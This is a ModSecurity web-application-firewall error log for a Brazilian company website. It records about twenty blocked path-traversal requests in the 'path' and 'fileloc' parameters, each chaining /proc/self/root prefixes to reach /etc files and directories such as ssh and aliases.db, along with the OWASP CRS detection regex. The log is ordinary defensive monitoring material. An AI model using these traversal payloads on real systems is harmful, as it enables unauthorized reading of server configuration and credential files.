[Mon Mar 16 16:45:16.301942 2026] [:error] [pid 21806:tid 140411565680384] [client 74.7.241.46:42158] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdy9SswJuvopo3lOhyugAAAJU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:45:17.671084 2026] [:error] [pid 10651:tid 140411691570944] [client 74.7.241.46:42172] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdzbysWC90G-1nBrBXewAAAYY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:45:18.899707 2026] [:error] [pid 14895:tid 140411599251200] [client 74.7.241.46:36704] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdzlajLEzk2WiQ-10mvgAAApE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:45:20.063237 2026] [:error] [pid 29802:tid 140411632822016] [client 74.7.241.46:36720] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhd0M_BxrYCr4hPDw_99wAAAc0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:45:21.431270 2026] [:error] [pid 29802:tid 140411708356352] [client 74.7.241.46:36734] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhd0c_BxrYCr4hPDw_9-AAAAcQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:45:23.031103 2026] [:error] [pid 10772:tid 140411716749056] [client 74.7.243.203:47874] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/aliases.db"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhd0v9ocpUE4ed4uDwGOwAAAgM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:45:23.031269 2026] [:error] [pid 29507:tid 140411641214720] [client 74.7.241.46:36746] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhd0kr9dMAiw-8KANNaZgAAAQw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:45:24.370462 2026] [:error] [pid 14895:tid 140411574073088] [client 74.7.243.203:34248] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/csh.login"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhd1FajLEzk2WiQ-10mvwAAApQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:45:24.463195 2026] [:error] [pid 15568:tid 140411691570944] [client 74.7.241.46:36748] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhd1KQpVkWug9HeOt9I_QAAA0Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:45:25.833529 2026] [:error] [pid 15061:tid 140411624429312] [client 74.7.241.46:36758] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhd1aTCbgAP5jq5TehARwAAAs4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:45:27.102602 2026] [:error] [pid 15568:tid 140411607643904] [client 74.7.241.46:36764] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhd16QpVkWug9HeOt9I_gAAA1A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:45:28.434419 2026] [:error] [pid 14895:tid 140411565680384] [client 74.7.241.46:40030] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhd2FajLEzk2WiQ-10mwQAAApU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:45:29.634733 2026] [:error] [pid 14895:tid 140411540502272] [client 74.7.241.46:40034] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhd2VajLEzk2WiQ-10mwgAAApg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:45:32.043597 2026] [:error] [pid 29507:tid 140411616036608] [client 74.7.241.46:40048] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhd3Er9dMAiw-8KANNacAAAAQ8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:45:32.304564 2026] [:error] [pid 21805:tid 140411624429312] [client 74.7.243.203:34264] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhd3LABkC4fWIHEf8EGugAAAE4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:45:39.785504 2026] [:error] [pid 21805:tid 140411733534464] [client 74.7.241.46:40058] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhd47ABkC4fWIHEf8EGxwAAAEE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:45:41.092052 2026] [:error] [pid 10772:tid 140411741927168] [client 74.7.241.46:42650] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhd5f9ocpUE4ed4uDwGPQAAAgA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:45:42.270737 2026] [:error] [pid 10831:tid 140411699963648] [client 74.7.241.46:42654] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhd5o6lpbStxTqkSkt-IAAAAkU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:45:43.563442 2026] [:error] [pid 21806:tid 140411590858496] [client 74.7.241.46:42660] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhd59SswJuvopo3lOhywAAAAJI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:45:52.012542 2026] [:error] [pid 21805:tid 140411574073088] [client 74.7.243.203:40958] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhd8LABkC4fWIHEf8EG1QAAAFQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:45:53.354261 2026] [:error] [pid 10651:tid 140411683178240] [client 74.7.243.203:60412] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhd8bysWC90G-1nBrBXhQAAAYc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
